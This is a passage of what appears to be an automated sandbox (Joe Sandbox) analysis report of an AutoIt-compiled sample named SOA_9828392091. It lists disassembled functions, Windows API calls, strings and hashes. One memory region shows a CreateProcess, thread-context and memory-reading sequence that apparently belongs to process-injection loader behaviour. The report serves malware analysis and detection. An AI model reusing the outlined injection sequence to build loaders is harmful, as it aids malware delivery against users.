                                        • Part of subcall function 0097BFA4: _wcscat.LIBCMT ref: 0097C0A9
                                        • Part of subcall function 0097BFA4: __wsplitpath.LIBCMT ref: 0097C0CE
                                        • Part of subcall function 0097BFA4: _wcscat.LIBCMT ref: 0097C0E4
                                        • Part of subcall function 0097BFA4: _wcscat.LIBCMT ref: 0097C0F7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                      • String ID: >>>AUTOIT SCRIPT<<<
                                      • API String ID: 2955681530-2806939583
                                      • Opcode ID: bc4b961736168f6a084dfad8179a8148ed267b537f8418b67b477f51feb26b5e
                                      • Instruction ID: 5652a1502b5e5a379955274d7f0b6c8c77b1cbad759a90d745bfdd7738e33003
                                      • Opcode Fuzzy Hash: bc4b961736168f6a084dfad8179a8148ed267b537f8418b67b477f51feb26b5e
                                      • Instruction Fuzzy Hash: B69193725047059FCB24EB55C891F9AB3E8BFD4310F048869F99D97291DB34EA48CB92

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0097BDB4: __time64.LIBCMT ref: 0097BDBE
                                        • Part of subcall function 00934517: _fseek.LIBCMT ref: 0093452F
                                      • __wsplitpath.LIBCMT ref: 0097C083
                                        • Part of subcall function 00951DFC: __wsplitpath_helper.LIBCMT ref: 00951E3C
                                      • _wcscpy.LIBCMT ref: 0097C096
                                      • _wcscat.LIBCMT ref: 0097C0A9
                                      • __wsplitpath.LIBCMT ref: 0097C0CE
                                      • _wcscat.LIBCMT ref: 0097C0E4
                                      • _wcscat.LIBCMT ref: 0097C0F7
                                      • _wcscmp.LIBCMT ref: 0097C03E
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C65D
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C670
                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0097C2A1
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0097C338
                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0097C34E
                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0097C35F
                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0097C371
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                      • String ID: p1#v`K$v
                                      • API String ID: 2378138488-1068180069
                                      • Opcode ID: b5b982d9b837f38fc43582297ab8af44c248b89c08a83f96e0fa28e9a668bc04
                                      • Instruction ID: e747ac4b2f3aa260c4ebc06886979d80542e53df438bcd9d1ce083be87dfa5cb
                                      • Opcode Fuzzy Hash: b5b982d9b837f38fc43582297ab8af44c248b89c08a83f96e0fa28e9a668bc04
                                      • Instruction Fuzzy Hash: C3C10DB2A00219AFDF15DF95CC85FDEB7BDAF85310F1080AAF609E6151DB709A848F61

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00933E79
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00933E88
                                      • LoadIconW.USER32(00000063), ref: 00933E9E
                                      • LoadIconW.USER32(000000A4), ref: 00933EB0
                                      • LoadIconW.USER32(000000A2), ref: 00933EC2
                                        • Part of subcall function 00934024: LoadImageW.USER32(00930000,00000063,00000001,00000010,00000010,00000000), ref: 00934048
                                      • RegisterClassExW.USER32(?), ref: 00933F30
                                        • Part of subcall function 00933F53: GetSysColorBrush.USER32(0000000F), ref: 00933F86
                                        • Part of subcall function 00933F53: RegisterClassExW.USER32(00000030), ref: 00933FB0
                                        • Part of subcall function 00933F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00933FC1
                                        • Part of subcall function 00933F53: LoadIconW.USER32(000000A9), ref: 00934004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 2880975755-4155596026
                                      • Opcode ID: c3b9cf3ebff8273d96ed3ce0c91a804779ea5ef4fa579d95fc781acc56be00cd
                                      • Instruction ID: 2db0698a2d603d8dddd6fe091e179688bf01441070237f4a595eeed63cb17445
                                      • Opcode Fuzzy Hash: c3b9cf3ebff8273d96ed3ce0c91a804779ea5ef4fa579d95fc781acc56be00cd
                                      • Instruction Fuzzy Hash: 022131B0E18304EBDB14DFA9ED45AA9BBF5EB48710F14422AE214A22A0D7754640EFD1

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 00933F86
                                      • RegisterClassExW.USER32(00000030), ref: 00933FB0
                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00933FC1
                                      • LoadIconW.USER32(000000A9), ref: 00934004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 975902462-1005189915
                                      • Opcode ID: d8ca5f99b4a2d49e6a5c96672f88fd5a65e3b333931cda8f8816a944f43ecba7
                                      • Instruction ID: f5ec62eda58df9ea19c89d91a747f9ec856c8c1bc3b05a507548244c48c97299
                                      • Opcode Fuzzy Hash: d8ca5f99b4a2d49e6a5c96672f88fd5a65e3b333931cda8f8816a944f43ecba7
                                      • Instruction Fuzzy Hash: 8321C5B5929318EFDB00DFA5E989BDDBBB4FB08710F00421AF521E62A0E7B54544EF91

                                      Control-flow Graph (graph image not reproduced; APIs on the path: CreateFileW, VirtualAlloc, ReadFile, CloseHandle, VirtualFree)
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 018B9B49
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 018B9D6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                      • Instruction ID: 6a7aa13b8fc3294155208e536b6844578211f6223516a4f696318fdd2cf82b51
                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                      • Instruction Fuzzy Hash: E6A10AB4E00209EBEB14CFA8C994BEEBBB5BF48308F108159E615BB381D7759A41CF54

                                      Control-flow Graph (graph image not reproduced; APIs on the path: RegOpenKeyExW, RegQueryValueExW, RegCloseKey)
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00934A1D
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009A41DB
                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009A421A
                                      • RegCloseKey.ADVAPI32(?), ref: 009A4249
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpen
                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                      • API String ID: 1586453840-614718249
                                      • Opcode ID: 84f2cfea642bae7108ae8d39bf87cb59a2e936377b29ee4699d2a35458e7c9fb
                                      • Instruction ID: 90ff7cc9ab6ecb11cbed4e56d8ad38b715f7d471b66a7d9cc6c51c5970efdae3
                                      • Opcode Fuzzy Hash: 84f2cfea642bae7108ae8d39bf87cb59a2e936377b29ee4699d2a35458e7c9fb
                                      • Instruction Fuzzy Hash: 4B117F71A41109BFEB04ABA4CE86EFF7BBCEF55354F000068B502D2191EA70AE02DB50

                                      Control-flow Graph (graph image not reproduced; APIs on the path: CreateWindowExW x2, ShowWindow x2)
                                      APIs
                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009336E6
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00933707
                                      • ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 0093371B
                                      • ShowWindow.USER32(00000000,?,?,?,?,00933AA3,?), ref: 00933724
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$CreateShow
                                      • String ID: AutoIt v3$edit
                                      • API String ID: 1584632944-3779509399
                                      • Opcode ID: be1347d16f6bd0a4143a40861993e73029a6c15b5e7420ce58ce5fa7992509e3
                                      • Instruction ID: 9fac1a90ad094e9edf53276890e8c70a59b120077e98d61763d9936dec84e08e
                                      • Opcode Fuzzy Hash: be1347d16f6bd0a4143a40861993e73029a6c15b5e7420ce58ce5fa7992509e3
                                      • Instruction Fuzzy Hash: A7F0DA719692D0BAEB315757AC48E772E7DD7C6F20B04012EFA04A21A0D9610895EAF1

                                      Control-flow Graph (graph image not reproduced; APIs on the path: CreateFileW, VirtualAlloc, ReadFile, ExitProcess)
                                      APIs
                                        • Part of subcall function 018B9728: Sleep.KERNELBASE(000001F4), ref: 018B9739
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 018B9970
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CreateFileSleep
                                      • String ID: 7XLFOILPY94NIOMR347F8HD6
                                      • API String ID: 2694422964-4052238
                                      • Opcode ID: 4b63768d7c27009b7ae0c8d6b2330c498b6a7cf52bc678097d9dec3602b46b26
                                      • Instruction ID: 290eac818b2e2373d4065357306d9c02676b0648bd81bb8e8ec99e7df070abee
                                      • Opcode Fuzzy Hash: 4b63768d7c27009b7ae0c8d6b2330c498b6a7cf52bc678097d9dec3602b46b26
                                      • Instruction Fuzzy Hash: 8A517770D04249DAEF11DBF8C894BEEBBB9AF15304F044199E248BB2C1D6B91B45CB65
                                      APIs
                                        • Part of subcall function 009341A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009339FE,?,00000001), ref: 009341DB
                                      • _free.LIBCMT ref: 009A36B7
                                      • _free.LIBCMT ref: 009A36FE
                                        • Part of subcall function 0093C833: __wsplitpath.LIBCMT ref: 0093C93E
                                        • Part of subcall function 0093C833: _wcscpy.LIBCMT ref: 0093C953
                                        • Part of subcall function 0093C833: _wcscat.LIBCMT ref: 0093C968
                                        • Part of subcall function 0093C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0093C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                      • API String ID: 805182592-1757145024
                                      • Opcode ID: 6d6ea7e38441a45fb0d1dc06b37cfa9340d23cd71eb302d1bc2c262cf4903b7d
                                      • Instruction ID: 6c068dcc69f072837771dd5bf2833d944991c9ba0a46b4e638c5ffbfcad684ad
                                      • Opcode Fuzzy Hash: 6d6ea7e38441a45fb0d1dc06b37cfa9340d23cd71eb302d1bc2c262cf4903b7d
                                      • Instruction Fuzzy Hash: AC916271910219AFCF04EFA4CC92AEEB7B4FF59310F548429F416AB291DB34AA45CF90
                                      APIs
                                        • Part of subcall function 00935374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009F1148,?,009361FF,?,00000000,00000001,00000000), ref: 00935392
                                        • Part of subcall function 009349FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00934A1D
                                      • _wcscat.LIBCMT ref: 009A2D80
                                      • _wcscat.LIBCMT ref: 009A2DB5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat$FileModuleNameOpen
                                      • String ID: \$\Include\
                                      • API String ID: 3592542968-2640467822
                                      • Opcode ID: f4db03756c1ba179ddc41538f95a5e42ed759d6f19d5d3aa1895b1293935dd0e
                                      • Instruction ID: a098c0e7603886e82240b071373b22ffa13277bdde9103f732262afcb06df20e
                                      • Opcode Fuzzy Hash: f4db03756c1ba179ddc41538f95a5e42ed759d6f19d5d3aa1895b1293935dd0e
                                      • Instruction Fuzzy Hash: 2D51827152D3409BC314EF59D982AAAB7F8FF89300F50452EF685932A1EB309908DF5A
                                      APIs
                                      • __getstream.LIBCMT ref: 009534FE
                                        • Part of subcall function 00957C0E: __getptd_noexit.LIBCMT ref: 00957C0E
                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 00953539
                                      • __wopenfile.LIBCMT ref: 00953549
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                      • String ID: <G
                                      • API String ID: 1820251861-2138716496
                                      • Opcode ID: bee998a4844423ae15f5d3f851fcf931aea8c12b27bfd973346555e7c001cb06
                                      • Instruction ID: 3110a0007c08a492987f2fde2ac8def95729861f7a75fe96270168b9311a3c42
                                      • Opcode Fuzzy Hash: bee998a4844423ae15f5d3f851fcf931aea8c12b27bfd973346555e7c001cb06
                                      • Instruction Fuzzy Hash: A9110A70A002069BDB12FFB39C4276E77A4AF85392B14C825FC19C7291FB34CB1997A1
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0094D28B,SwapMouseButtons,00000004,?), ref: 0094D2BC
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0094D28B,SwapMouseButtons,00000004,?,?,?,?,0094C865), ref: 0094D2DD
                                      • RegCloseKey.KERNELBASE(00000000,?,?,0094D28B,SwapMouseButtons,00000004,?,?,?,?,0094C865), ref: 0094D2FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: d1ae361b30403670a670cdcffaaada33d38c3e236c51324c2fe83beb98a44d4b
                                      • Instruction ID: 4a8259bed96bc9fa15009ef34a7285153b61494427b656c07d535f5a7ae83714
                                      • Opcode Fuzzy Hash: d1ae361b30403670a670cdcffaaada33d38c3e236c51324c2fe83beb98a44d4b
                                      • Instruction Fuzzy Hash: 64117979616209BFDB218FA4CC84EAF7BBCEF05758F004929E801D7114E671EE40AB60
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018B8F55
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018B8F79
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018B8F9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125350713.00000000018B7000.00000040.00000020.00020000.00000000.sdmp, Offset: 018B7000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_18b7000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                      • Instruction ID: 5db601d6333b8c0e4081d70b69bca9f55059e8cc6e7ec050c230529bc0d1bf2d
                                      • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                      • Instruction Fuzzy Hash: C2621B70E146189BEB24CFA4C880BDEB776EF58304F1091A9D21DEB390E7759E81CB59
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                      • String ID:
                                      • API String ID: 3877424927-0
                                      • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                      • Instruction ID: 5cbcba76d2cc548bbd59434b77b8f0f0ad0ea01e4603c5387bbb408f5e73a151
                                      • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                      • Instruction Fuzzy Hash: B951EAB1E01305ABCB28CF6BC88566E77A5AF443A2F24C72DFC25862D0D7759F589B40
                                      APIs
                                        • Part of subcall function 00934517: _fseek.LIBCMT ref: 0093452F
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C65D
                                        • Part of subcall function 0097C56D: _wcscmp.LIBCMT ref: 0097C670
                                      • _free.LIBCMT ref: 0097C4DD
                                      • _free.LIBCMT ref: 0097C4E4
                                      • _free.LIBCMT ref: 0097C54F
                                        • Part of subcall function 00951C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00957A85), ref: 00951CB1
                                        • Part of subcall function 00951C9D: GetLastError.KERNEL32(00000000,?,00957A85), ref: 00951CC3
                                      • _free.LIBCMT ref: 0097C557
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                      • String ID:
                                      • API String ID: 1552873950-0
                                      • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                      • Instruction ID: 91282ae54ce5661c7216039ff88169899aac7353b61def825cd480642a7d4913
                                      • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                      • Instruction Fuzzy Hash: 1A515CF1A04218AFDF149F64DC81BADBBB9EF48304F1044AEF65DA3251DB716A808F58
                                      APIs
                                      • _memset.LIBCMT ref: 0094EBB2
                                        • Part of subcall function 009351AF: _memset.LIBCMT ref: 0093522F
                                        • Part of subcall function 009351AF: _wcscpy.LIBCMT ref: 00935283
                                        • Part of subcall function 009351AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00935293
                                      • KillTimer.USER32(?,00000001,?,?), ref: 0094EC07
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0094EC16
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009A3C88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      • Opcode ID: 6ee9746737516f70e407566919ebd838dccfa6229773d7067697237fefc2e075
                                      • Instruction ID: 3d8607d02c3700732b79748eb44437f98dd3dbb6c8a71931bece26596b2fd2e9
                                      • Opcode Fuzzy Hash: 6ee9746737516f70e407566919ebd838dccfa6229773d7067697237fefc2e075
                                      • Instruction Fuzzy Hash: F721DA709087849FE7329B248C95FE7BBFCAB46318F04448DE6CA56181D7742A84CB91
                                      APIs
                                        • Part of subcall function 0095395C: __FF_MSGBANNER.LIBCMT ref: 00953973
                                        • Part of subcall function 0095395C: __NMSG_WRITE.LIBCMT ref: 0095397A
                                        • Part of subcall function 0095395C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001), ref: 0095399F
                                      • std::exception::exception.LIBCMT ref: 0094F51E
                                      • __CxxThrowException@8.LIBCMT ref: 0094F533
                                        • Part of subcall function 00956805: RaiseException.KERNEL32(?,?,0000000E,009E6A30,?,?,?,0094F538,0000000E,009E6A30,?,00000001), ref: 00956856
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                      • String ID: bad allocation
                                      • API String ID: 3902256705-2104205924
                                      • Opcode ID: 47b31ab0ad511d2a556be2699a90bbf4f615ccd9d460fcaddff0af41a507c4d8
                                      • Instruction ID: bd2eeb2c86c89630133cac7442cae6d6b10984194e27456444dfa0817edd5fec
                                      • Opcode Fuzzy Hash: 47b31ab0ad511d2a556be2699a90bbf4f615ccd9d460fcaddff0af41a507c4d8
                                      • Instruction Fuzzy Hash: 33F0AF3110521EA7DB14FF99D921EEEB7ECAF40364F604439FD08A2191DFB09A4887A5
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?), ref: 0097C72F
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0097C746
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: 8493969d1e82c8b03907281049634f088bebb66c6c01128c4abcc511684529e2
                                      • Instruction ID: 456116110b26a8077be234c595d6c85e571b2bfa06c89e63cb92dda28b36688e
                                      • Opcode Fuzzy Hash: 8493969d1e82c8b03907281049634f088bebb66c6c01128c4abcc511684529e2
                                      • Instruction Fuzzy Hash: 84D05E7150030EAFDB10AB90DD0EF8A776C9B00728F0002A07660A50B2EBB0E6998B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
